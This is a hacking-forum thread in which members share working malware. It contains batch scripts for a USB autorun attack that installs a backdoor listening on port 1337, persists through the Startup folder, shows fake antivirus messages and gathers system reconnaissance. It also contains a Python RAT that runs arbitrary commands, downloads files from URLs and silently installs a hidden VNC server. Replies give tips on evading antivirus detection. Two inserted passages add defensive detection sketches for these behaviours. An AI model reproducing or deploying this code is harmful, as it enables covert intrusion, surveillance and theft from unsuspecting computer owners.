
usb hack...


Pizza


Programs used

Notepad to write batch scripts

WindowsRAT.exe to open port 1337

IExpress to make the file and command(windowsrat.exe 1337) run in background

http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e

http://www.virustotal.com/analisis/120844c...366e-1245102553

not detected.

this is just a basic thing.

autorun.bat: this will start when you plug in the USB drive (there is an autorun.inf on it, but if the computer has autorun disabled this is the file you should start).

@echo off
start /min launch.exe
cls
start /min launch.bat
cls
exit

launch.exe has windowsrat.exe (I did not write this; I downloaded it from somewhere, I think it's from Packet Storm). I used IExpress and put windowsrat.exe in it, and it will run in the background. The command windowsrat.exe 1337 is executed, so the server is on port 1337; now you can connect to it using telnet.

launch.bat: this will be minimized, but just in case someone opens the window it will have false messages. As you can see, this puts launch.exe in System32 and copies startupsystem.bat to the user's Startup folder. This also collects the IP address, and then you can telnet to that IP address and port 1337.

echo off
copy launch.exe C:\Windows\System32
cls
copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup"
cls
mkdir \Information\%USERNAME%
cls
Echo Anti-Virus Portable
systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt
cls
Echo Anti-Virus Portable
arp -a > \Information\%USERNAME%\%USERNAME%arp.txt
cls
Echo Searching and Removing Virus
netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt
cls
Echo Searching and Removing Virus
ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt
cls
Echo Searching and Removing Virus
tasklist > \Information\%USERNAME%\%USERNAME%task.txt
cls
Echo Searching and Removing Virus
net group > \Information\%USERNAME%\%USERNAME%group.txt
cls
Echo Searching and Removing Virus
net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt
cls
Echo Searching and Removing Virus
net share > \Information\%USERNAME%\%USERNAME%share.txt
cls
Echo Searching and Removing Virus
net use > \Information\%USERNAME%\%USERNAME%use.txt
cls
Echo Searching and Removing Virus
net user > \Information\%USERNAME%\%USERNAME%users.txt
cls
Echo No Virus Found
net view > \Information\%USERNAME%\%USERNAME%view.txt
Echo No Virus Found
cls
exit

startupsystem.bat: this will start launch.exe when the computer starts up and this user logs in. I tried to make it a service but I couldn't... if you can, you should do that.

start launch.exe
exit

removal.bat: it deletes launch.exe from sys32 and deletes startupsystem.bat...

@echo off
del "C:\Windows\System32\Launch.exe"
cls
del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat"
cls
exit

You should have autorun disabled, and monitor your Startup folder. I think some anti-spyware does it, but it's good if you check it.

I am not a coder, but if you are you can improve this... DO IT.

Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html

-Pizza (aka JPizza)
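
Added example, not part of the original post: a detection sketch for the launch.bat behaviour described above, where a single cmd.exe parent spawns many discovery commands within seconds of each other. The event tuples are constructed sample data shaped like process-creation logs (Sysmon Event ID 1 or Security 4688); the function names, the 60-second window and the threshold of 5 are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands that launch.bat runs back to back (taken from the post).
RECON = {"systeminfo", "arp", "netstat", "ipconfig", "tasklist", "net group",
         "net localgroup", "net share", "net use", "net user", "net view"}

# Constructed sample: (time, parent PID, child command line). cmd.exe handles
# the "> file" redirection itself, so it never appears in the child's line.
SAMPLE_EVENTS = [
    ("2009-06-15 21:40:01", 3120, "systeminfo"),
    ("2009-06-15 21:40:09", 3120, "arp -a"),
    ("2009-06-15 21:40:10", 3120, "netstat -a"),
    ("2009-06-15 21:40:12", 3120, r"C:\Windows\System32\ipconfig.exe"),
    ("2009-06-15 21:40:13", 3120, "tasklist"),
    ("2009-06-15 21:40:14", 3120, "net localgroup"),
    ("2009-06-15 21:40:15", 3120, "net user"),
    ("2009-06-15 09:02:00", 880, "ipconfig /all"),   # ordinary troubleshooting
    ("2009-06-15 09:30:00", 880, "netstat -ano"),
]

def recon_key(cmdline):
    """Map a child command line to a recon signature, or None."""
    words = cmdline.lower().replace(".exe", "").split()
    if not words:
        return None
    name = words[0].rsplit("\\", 1)[-1]          # drop any directory prefix
    key = "net " + words[1] if name == "net" and len(words) > 1 else name
    return key if key in RECON else None

def find_recon_bursts(events, window=timedelta(seconds=60), threshold=5):
    """Return {parent_pid: sorted signatures} for parents that spawn at least
    `threshold` distinct recon commands inside one sliding `window`."""
    by_parent = defaultdict(list)
    for ts, ppid, cmdline in events:
        key = recon_key(cmdline)
        if key:
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            by_parent[ppid].append((when, key))
    alerts = {}
    for ppid, hits in by_parent.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1                        # slide the window forward
            seen = {k for _, k in hits[start:end + 1]}
            if len(seen) >= threshold:
                alerts[ppid] = sorted(seen | set(alerts.get(ppid, [])))
    return alerts
```

Running `find_recon_bursts(SAMPLE_EVENTS)` flags parent 3120 only; the two widely spaced commands from parent 880 stay below the threshold.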



add (this simple code :))

Title Anti-Virus Scanning...
Color 0a

For effect :)


It will get detected more and more if you upload to VirusTotal, as they distribute samples. For things like this you should use
hXXp://scanner.novirusthanks.org

and tick the do not distribute box ;)

thank you.


Here is a RAT I have been working on in Python. It's not done. Download Terry the Trojan and use that as the client to send/receive data.

from Tkinter import *
 from tkMessageBox import *
 from ScrolledText import *
 import socket
 import sys

 portvar = 2727
 try:
     if sys.argv[1] == "/port":
         try:
             portvar = int(sys.argv[2])
         except:
             portvar = 2727
 except:
     portvar = 2727

 def std(string):
     stdbox.config(state=NORMAL)
     stdbox.insert(END,"" + string + "\n")
     stdbox.config(state=DISABLED)

 def cnnect(var="poo"):
     sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     success = 1
     try:
         sockt.connect((ipbox.get(),portvar))
     except:
         success = 0
         std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.")
     if success == 1:
         sockt.send(cmdbox.get())
         retdata = sockt.recv(2048)
         std(retdata)

 root = Tk()
 root.title("Terry the Trojan")
 #FRAMES
 ipfrm = Frame(root)
 ipfrm.pack()
 cmdfrm = Frame(root)
 cmdfrm.pack()
 stdfrm = Frame(root)
 stdfrm.pack()
 #IP/Port Entry Widgets
 Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1)
 ipbox = Entry(ipfrm,width=50)
 ipbox.grid(row=1,column=2)
 #Returned output widgets
 stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000")
 stdbox.grid(row=1,column=1)
 #Command sending widgets
 cmdbox = Entry(cmdfrm,width=50)
 cmdbox.grid(row=1,column=1)
 Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2)
 cmdbox.bind("<Return>",cnnect)
 root.mainloop()

HAH shit, wrong code. I'll post it in a min.

OK HERE is the RAT, sorry about that. You should be able to tell what the commands do.

import socket,os,sys,urllib,re,ftplib
from time import sleep
port = 2727
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sockt.bind(('',port))
sockt.listen(1)
while True:
    channel, details = sockt.accept()
    command = channel.recv(2048)
    if command == "kill":
        channel.send("Server trojan has been closed.")
        sys.exit()
    elif command == "ip":
        connect = s.connect(("www.whatismyipaddress.com", 80))
        s.send('GET / HTTP/1.0\n\n')
        socketlines = s.recv(2048)
        lines = socketlines.split()
        ip = lines[len(lines) - 1]
        channel.send(ip)
    elif command == "whoami":
        channel.send(os.environ["USERNAME"])
    elif command == "drive":
        channel.send(os.environ["HOMEDRIVE"])
    elif command == "userfolder":
        channel.send(os.environ["HOMEPATH"])
    elif command == "installvnc":
        urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe')
        fs=os.popen3('update.exe /sp- /verysilent','b')
        sleep(1)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
        sleep(1)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
        sleep(0.2)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
        sleep(0.5)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
        sleep(1)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
        sleep(0.3)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
        sleep(1)
        fs=os.popen3('net start "VNC Server"','b')
        fs=os.popen3('del update.exe','b')
        channel.send("VNC was installed, password is vncserv.")
    elif command == "netstat":
        fs=os.popen3('netstat -ano>windsys.ini','b')
        sleep(2)
        f = open('windsys.ini')
        channel.send(f.read())
        f.close()
    elif command == "whereami":
        channel.send(os.getcwd())
    elif command.startswith("download "):
        file = command.replace("download ", "")
        urllib.urlretrieve(file,"file.exe")
        channel.send("File downloaded. Saved as 'file.exe', rename extension")     
    else:
        csuc = 1
        try:
            fs=os.popen3(command,'b')
        except:
            csuc = 0
        if csuc == 1:
            channel.send("Command Sucessful")
        else:
            channel.send("Command Failed")
        channel.close()
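
Added example, not part of the original post: both backdoors in this thread (windowsrat.exe on port 1337 and the Python script on port 2727) bind a TCP listener on all interfaces, so they appear in `netstat -ano` output on the affected host. The sketch below parses that output and reports network-reachable listeners outside an approved port list; the sample output, the baseline and the function names are constructed assumptions.

```python
# Constructed `netstat -ano` output; PIDs and addresses are made up.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1337           0.0.0.0:0              LISTENING       3344
  TCP    0.0.0.0:2727           0.0.0.0:0              LISTENING       2980
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       1608
  TCP    192.168.1.20:49211     203.0.113.7:443        ESTABLISHED     2104
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5355           *:*                                    1100
"""

# Assumed baseline: listening ports approved for this host.
BASELINE_PORTS = {135, 445}

def parse_listeners(text):
    """Yield (local_ip, port, pid) for every TCP socket in LISTENING state."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            ip, _, port = fields[1].rpartition(":")   # also handles [::]:445
            yield ip.strip("[]"), int(port), int(fields[4])

def unexpected_listeners(text, baseline=BASELINE_PORTS):
    """Return sorted (port, pid, ip) for listeners that are reachable from the
    network (not loopback-only) and whose port is not in the baseline."""
    found = set()
    for ip, port, pid in parse_listeners(text):
        loopback = ip.startswith("127.") or ip == "::1"
        if not loopback and port not in baseline:
            found.add((port, pid, ip))
    return sorted(found)
```

Each reported PID can then be matched to an image name and path with `tasklist` before deciding whether the listener belongs on the machine.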



The download link is not working. All I could see on that site is spam and advertising. Please upload to a new site so I could download it. Thank you.


I wrote a couple netcat clones in Python.... I don't think I'll release my code though, 'cause I don't feel like having it ever get blacklisted by antivirus...

dingleberries... you should check out the Twisted Python library for more advanced networking capabilities, it's pretty nice to work with...
